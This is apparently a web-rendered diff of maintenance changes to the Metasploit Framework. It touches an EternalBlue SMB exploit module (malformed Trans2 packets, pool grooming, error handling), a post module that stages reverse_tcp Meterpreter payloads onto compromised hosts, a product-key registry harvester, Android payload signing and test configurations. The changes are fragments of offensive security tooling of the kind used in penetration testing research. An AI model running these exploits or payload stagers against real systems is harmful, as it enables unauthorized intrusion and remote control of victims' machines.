@module_metadata_cache[get_cache_key(module_instance)] = metadata_obj
|
@module_metadata_cache[get_cache_key(module_instance)] = metadata_obj
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -78,7 +78,7 @@ module Msf::Payload::Android
|
||||||
cert.public_key = key.public_key
|
cert.public_key = key.public_key
|
||||||
|
|
||||||
# Some time within the last 3 years
|
# Some time within the last 3 years
|
||||||
cert.not_before = Time.now - rand(3600*24*365*3)
|
cert.not_before = Time.now - rand(3600 * 24 * 365 * 3)
|
||||||
|
|
||||||
# From http://developer.android.com/tools/publishing/app-signing.html
|
# From http://developer.android.com/tools/publishing/app-signing.html
|
||||||
# """
|
# """
|
||||||
|
@ -89,7 +89,16 @@ module Msf::Payload::Android
|
||||||
# requirement. You cannot upload an application if it is signed
|
# requirement. You cannot upload an application if it is signed
|
||||||
# with a key whose validity expires before that date.
|
# with a key whose validity expires before that date.
|
||||||
# """
|
# """
|
||||||
cert.not_after = cert.not_before + 3600*24*365*20 # 20 years
|
#
|
||||||
|
# 32-bit Ruby (and 64-bit Ruby on Windows) cannot deal with
|
||||||
|
# certificate not_after times later than Jan 1st 2038, since long is 32-bit.
|
||||||
|
# Set not_after to a random time 2~ years before the first bad date.
|
||||||
|
#
|
||||||
|
# FIXME: this will break again randomly starting in late 2033, hopefully
|
||||||
|
# all 32-bit systems will be dead by then...
|
||||||
|
#
|
||||||
|
# The timestamp 0x78045d81 equates to 2033-10-22 00:00:01 UTC
|
||||||
|
cert.not_after = Time.at(0x78045d81 + rand(0x7fffffff - 0x78045d81))
|
||||||
|
|
||||||
# If this line is left out, signature verification fails on OSX.
|
# If this line is left out, signature verification fails on OSX.
|
||||||
cert.sign(key, OpenSSL::Digest::SHA1.new)
|
cert.sign(key, OpenSSL::Digest::SHA1.new)
|
||||||
|
|
|
@ -216,7 +216,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
@cert.issuer = x509_name
|
@cert.issuer = x509_name
|
||||||
@cert.public_key = @key.public_key
|
@cert.public_key = @key.public_key
|
||||||
@cert.not_before = Time.now
|
@cert.not_before = Time.now
|
||||||
@cert.not_after = @cert.not_before + 3600*24*365*3 # 3 years
|
# FIXME: this will break in the year 2037 on 32-bit systems
|
||||||
|
@cert.not_after = @cert.not_before + 3600 * 24 * 365 # 1 year
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -52,6 +52,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
if datastore['DisablePayloadHandler']
|
||||||
|
print_error "DisablePayloadHandler is enabled, so there is nothing to do. Exiting!"
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
stime = Time.now.to_f
|
stime = Time.now.to_f
|
||||||
timeout = datastore['ListenerTimeout'].to_i
|
timeout = datastore['ListenerTimeout'].to_i
|
||||||
loop do
|
loop do
|
||||||
|
|
|
@ -59,7 +59,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
],
|
],
|
||||||
'DefaultOptions' =>
|
'DefaultOptions' =>
|
||||||
{
|
{
|
||||||
'EXITFUNC' => 'thread',
|
'EXITFUNC' => 'thread',
|
||||||
|
'WfsDelay' => 5,
|
||||||
},
|
},
|
||||||
'Privileged' => true,
|
'Privileged' => true,
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
|
@ -120,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
# we don't need this sleep, and need to find a way to remove it
|
# we don't need this sleep, and need to find a way to remove it
|
||||||
# problem is session_count won't increment until stage is complete :\
|
# problem is session_count won't increment until stage is complete :\
|
||||||
secs = 0
|
secs = 0
|
||||||
while !session_created? and secs < 5
|
while !session_created? and secs < 30
|
||||||
secs += 1
|
secs += 1
|
||||||
sleep 1
|
sleep 1
|
||||||
end
|
end
|
||||||
|
@ -139,16 +140,24 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
|
||||||
rescue EternalBlueError => e
|
rescue EternalBlueError => e
|
||||||
print_error("#{e.message}")
|
print_error("#{e.message}")
|
||||||
|
return false
|
||||||
|
rescue ::RubySMB::Error::NegotiationFailure
|
||||||
|
print_error("SMB Negotiation Failure -- this often occurs when lsass crashes. The target may reboot in 60 seconds.")
|
||||||
|
return false
|
||||||
rescue ::RubySMB::Error::UnexpectedStatusCode,
|
rescue ::RubySMB::Error::UnexpectedStatusCode,
|
||||||
::Errno::ECONNRESET,
|
::Errno::ECONNRESET,
|
||||||
::Rex::HostUnreachable,
|
::Rex::HostUnreachable,
|
||||||
::Rex::ConnectionTimeout,
|
::Rex::ConnectionTimeout,
|
||||||
::Rex::ConnectionRefused => e
|
::Rex::ConnectionRefused,
|
||||||
|
::RubySMB::Error::CommunicationError => e
|
||||||
print_error("#{e.class}: #{e.message}")
|
print_error("#{e.class}: #{e.message}")
|
||||||
|
report_failure
|
||||||
|
return false
|
||||||
rescue => error
|
rescue => error
|
||||||
print_error(error.class.to_s)
|
print_error(error.class.to_s)
|
||||||
print_error(error.message)
|
print_error(error.message)
|
||||||
print_error(error.backtrace.join("\n"))
|
print_error(error.backtrace.join("\n"))
|
||||||
|
return false
|
||||||
ensure
|
ensure
|
||||||
# pass
|
# pass
|
||||||
end
|
end
|
||||||
|
@ -286,6 +295,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
'''
|
||||||
#
|
#
|
||||||
# Increase the default delay by five seconds since some kernel-mode
|
# Increase the default delay by five seconds since some kernel-mode
|
||||||
# payloads may not run immediately.
|
# payloads may not run immediately.
|
||||||
|
@ -293,7 +303,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
def wfs_delay
|
def wfs_delay
|
||||||
super + 5
|
super + 5
|
||||||
end
|
end
|
||||||
|
'''
|
||||||
|
|
||||||
def smb2_grooms(grooms, payload_hdr_pkt)
|
def smb2_grooms(grooms, payload_hdr_pkt)
|
||||||
grooms.times do |groom_id|
|
grooms.times do |groom_id|
|
||||||
|
@ -337,7 +347,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
vprint_status("Sending malformed Trans2 packets")
|
vprint_status("Sending malformed Trans2 packets")
|
||||||
sock.put(trans2_pkt_nulled)
|
sock.put(trans2_pkt_nulled)
|
||||||
|
|
||||||
sock.get_once
|
begin
|
||||||
|
sock.get_once
|
||||||
|
rescue EOFError
|
||||||
|
vprint_error("No response back from SMB echo request. Continuing anyway...")
|
||||||
|
end
|
||||||
|
|
||||||
client.echo(count:1, data: "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00")
|
client.echo(count:1, data: "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00")
|
||||||
end
|
end
|
||||||
|
|
|
@ -81,8 +81,10 @@ class MetasploitModule < Msf::Post
|
||||||
psh_arch = 'x86'
|
psh_arch = 'x86'
|
||||||
vprint_status("Platform: Windows")
|
vprint_status("Platform: Windows")
|
||||||
when 'osx'
|
when 'osx'
|
||||||
platform = 'python'
|
platform = 'osx'
|
||||||
payload_name = 'python/meterpreter/reverse_tcp'
|
payload_name = 'osx/x64/meterpreter/reverse_tcp'
|
||||||
|
lplat = [Msf::Platform::OSX]
|
||||||
|
larch = [ARCH_X64]
|
||||||
vprint_status("Platform: OS X")
|
vprint_status("Platform: OS X")
|
||||||
when 'solaris'
|
when 'solaris'
|
||||||
platform = 'python'
|
platform = 'python'
|
||||||
|
@ -99,8 +101,10 @@ class MetasploitModule < Msf::Post
|
||||||
larch = [ARCH_X86]
|
larch = [ARCH_X86]
|
||||||
vprint_status("Platform: Linux")
|
vprint_status("Platform: Linux")
|
||||||
elsif target_info =~ /darwin/i
|
elsif target_info =~ /darwin/i
|
||||||
platform = 'python'
|
platform = 'osx'
|
||||||
payload_name = 'python/meterpreter/reverse_tcp'
|
payload_name = 'osx/x64/meterpreter/reverse_tcp'
|
||||||
|
lplat = [Msf::Platform::OSX]
|
||||||
|
larch = [ARCH_X64]
|
||||||
vprint_status("Platform: OS X")
|
vprint_status("Platform: OS X")
|
||||||
elsif cmd_exec('python -V 2>&1') =~ /Python (2|3)\.(\d)/
|
elsif cmd_exec('python -V 2>&1') =~ /Python (2|3)\.(\d)/
|
||||||
# Generic fallback for OSX, Solaris, Linux/ARM
|
# Generic fallback for OSX, Solaris, Linux/ARM
|
||||||
|
@ -162,7 +166,7 @@ class MetasploitModule < Msf::Post
|
||||||
print_error('Powershell is not installed on the target.') if datastore['WIN_TRANSFER'] == 'POWERSHELL'
|
print_error('Powershell is not installed on the target.') if datastore['WIN_TRANSFER'] == 'POWERSHELL'
|
||||||
vprint_status("Transfer method: VBS [fallback]")
|
vprint_status("Transfer method: VBS [fallback]")
|
||||||
exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
|
exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
|
||||||
aborted = transmit_payload(exe)
|
aborted = transmit_payload(exe, platform)
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
when 'python'
|
when 'python'
|
||||||
|
@ -171,7 +175,7 @@ class MetasploitModule < Msf::Post
|
||||||
else
|
else
|
||||||
vprint_status("Transfer method: Bourne shell [fallback]")
|
vprint_status("Transfer method: Bourne shell [fallback]")
|
||||||
exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
|
exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
|
||||||
aborted = transmit_payload(exe)
|
aborted = transmit_payload(exe, platform)
|
||||||
end
|
end
|
||||||
|
|
||||||
if datastore['HANDLER']
|
if datastore['HANDLER']
|
||||||
|
@ -181,7 +185,7 @@ class MetasploitModule < Msf::Post
|
||||||
return nil
|
return nil
|
||||||
end
|
end
|
||||||
|
|
||||||
def transmit_payload(exe)
|
def transmit_payload(exe, platform)
|
||||||
#
|
#
|
||||||
# Generate the stager command array
|
# Generate the stager command array
|
||||||
#
|
#
|
||||||
|
@ -193,16 +197,18 @@ class MetasploitModule < Msf::Post
|
||||||
:linemax => linemax,
|
:linemax => linemax,
|
||||||
#:nodelete => true # keep temp files (for debugging)
|
#:nodelete => true # keep temp files (for debugging)
|
||||||
}
|
}
|
||||||
if session.platform == 'windows'
|
case platform
|
||||||
|
when 'windows'
|
||||||
opts[:decoder] = File.join(Rex::Exploitation::DATA_DIR, "exploits", "cmdstager", 'vbs_b64')
|
opts[:decoder] = File.join(Rex::Exploitation::DATA_DIR, "exploits", "cmdstager", 'vbs_b64')
|
||||||
cmdstager = Rex::Exploitation::CmdStagerVBS.new(exe)
|
cmdstager = Rex::Exploitation::CmdStagerVBS.new(exe)
|
||||||
|
when 'osx'
|
||||||
|
opts[:background] = true
|
||||||
|
cmdstager = Rex::Exploitation::CmdStagerPrintf.new(exe)
|
||||||
else
|
else
|
||||||
opts[:background] = true
|
opts[:background] = true
|
||||||
opts[:temp] = datastore['BOURNE_PATH']
|
opts[:temp] = datastore['BOURNE_PATH']
|
||||||
opts[:file] = datastore['BOURNE_FILE']
|
opts[:file] = datastore['BOURNE_FILE']
|
||||||
cmdstager = Rex::Exploitation::CmdStagerBourne.new(exe)
|
cmdstager = Rex::Exploitation::CmdStagerBourne.new(exe)
|
||||||
# Note: if a OS X binary payload is added in the future, use CmdStagerPrintf
|
|
||||||
# as /bin/sh on OS X doesn't support the -n option on echo
|
|
||||||
end
|
end
|
||||||
|
|
||||||
cmds = cmdstager.generate(opts)
|
cmds = cmdstager.generate(opts)
|
||||||
|
|
|
@ -31,6 +31,7 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
keys = [
|
keys = [
|
||||||
[ "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "DigitalProductId" ],
|
[ "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "DigitalProductId" ],
|
||||||
|
[ "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "DigitalProductId4" ],
|
||||||
[ "HKLM\\SOFTWARE\\Microsoft\\Office\\11.0\\Registration\\{91110409-6000-11D3-8CFE-0150048383C9}", "DigitalProductId" ],
|
[ "HKLM\\SOFTWARE\\Microsoft\\Office\\11.0\\Registration\\{91110409-6000-11D3-8CFE-0150048383C9}", "DigitalProductId" ],
|
||||||
[ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-00CA-0000-0000-0000000FF1CE}", "DigitalProductId" ],
|
[ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-00CA-0000-0000-0000000FF1CE}", "DigitalProductId" ],
|
||||||
[ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0014-0000-0000-0000000FF1CE}", "DigitalProductId" ],
|
[ "HKLM\\SOFTWARE\\Microsoft\\Office\\12.0\\Registration\\{91120000-0014-0000-0000-0000000FF1CE}", "DigitalProductId" ],
|
||||||
|
|
|
@ -32,7 +32,7 @@ end
|
||||||
if (framework.plugins.to_s =~ /[Ww]map/)
|
if (framework.plugins.to_s =~ /[Ww]map/)
|
||||||
print_line("Wmap plugin already loaded ...")
|
print_line("Wmap plugin already loaded ...")
|
||||||
else
|
else
|
||||||
print_line("loading the wmap plugin ...")
|
print_line("Loading the wmap plugin ...")
|
||||||
run_single("load wmap")
|
run_single("load wmap")
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -78,7 +78,7 @@ framework.db.hosts.each do |host|
|
||||||
end
|
end
|
||||||
run_single("wmap_targets -c")
|
run_single("wmap_targets -c")
|
||||||
print_line("")
|
print_line("")
|
||||||
print_line("finished analysing the webservern on IP #{host.address.to_s}, Port: #{serv.port.to_s}")
|
print_line("Finished analysing the webserver on IP #{host.address.to_s}, Port: #{serv.port.to_s}")
|
||||||
print_line("")
|
print_line("")
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -11,7 +11,7 @@
|
||||||
"TYPE": "VIRTUAL",
|
"TYPE": "VIRTUAL",
|
||||||
"METHOD": "VM_TOOLS_UPLOAD",
|
"METHOD": "VM_TOOLS_UPLOAD",
|
||||||
"HYPERVISOR_CONFIG": "../JSON/esxi_config.json",
|
"HYPERVISOR_CONFIG": "../JSON/esxi_config.json",
|
||||||
"NAME": "APT_MSF_HOST",
|
"CPE": "cpe:/a:rapid7:metasploit:::",
|
||||||
"MSF_ARTIFACT_PATH": "/home/msfuser/rapid7/test_artifacts",
|
"MSF_ARTIFACT_PATH": "/home/msfuser/rapid7/test_artifacts",
|
||||||
"MSF_PATH": "/home/msfuser/rapid7/metasploit-framework"
|
"MSF_PATH": "/home/msfuser/rapid7/metasploit-framework"
|
||||||
}
|
}
|
||||||
|
@ -22,7 +22,7 @@
|
||||||
{
|
{
|
||||||
"TYPE": "VIRTUAL",
|
"TYPE": "VIRTUAL",
|
||||||
"METHOD": "EXPLOIT",
|
"METHOD": "EXPLOIT",
|
||||||
"NAME": "Win2008r2x64sp1",
|
"CPE": "cpe:/o:microsoft:windows_server_2008:r2:sp1:x64",
|
||||||
"MODULES":
|
"MODULES":
|
||||||
[
|
[
|
||||||
{
|
{
|
||||||
|
@ -37,7 +37,7 @@
|
||||||
{
|
{
|
||||||
"TYPE": "VIRTUAL",
|
"TYPE": "VIRTUAL",
|
||||||
"METHOD": "EXPLOIT",
|
"METHOD": "EXPLOIT",
|
||||||
"NAME": "Win2012x64",
|
"CPE": "cpe:/o:microsoft:windows_server_2016:::x64",
|
||||||
"MODULES":
|
"MODULES":
|
||||||
[
|
[
|
||||||
{
|
{
|
||||||
|
|
|
@ -9,7 +9,7 @@
|
||||||
"TYPE": "VIRTUAL",
|
"TYPE": "VIRTUAL",
|
||||||
"METHOD": "VM_TOOLS_UPLOAD",
|
"METHOD": "VM_TOOLS_UPLOAD",
|
||||||
"HYPERVISOR_CONFIG": "../JSON/esxi_config.json",
|
"HYPERVISOR_CONFIG": "../JSON/esxi_config.json",
|
||||||
"NAME": "APT_MSF_HOST",
|
"CPE": "cpe:/a:rapid7:metasploit:::",
|
||||||
"MSF_PATH": "/home/msfuser/rapid7/metasploit-framework",
|
"MSF_PATH": "/home/msfuser/rapid7/metasploit-framework",
|
||||||
"MSF_ARTIFACT_PATH": "/home/msfuser/rapid7/test_artifacts"
|
"MSF_ARTIFACT_PATH": "/home/msfuser/rapid7/test_artifacts"
|
||||||
}
|
}
|
||||||
|
@ -30,7 +30,7 @@
|
||||||
{
|
{
|
||||||
"TYPE": "VIRTUAL",
|
"TYPE": "VIRTUAL",
|
||||||
"METHOD": "EXPLOIT",
|
"METHOD": "EXPLOIT",
|
||||||
"NAME": "Win7x64"
|
"NAME": "SATA_Win7x64"
|
||||||
}
|
}
|
||||||
],
|
],
|
||||||
"MODULES":
|
"MODULES":
|
||||||
|
|
Loading…
Reference in New Issue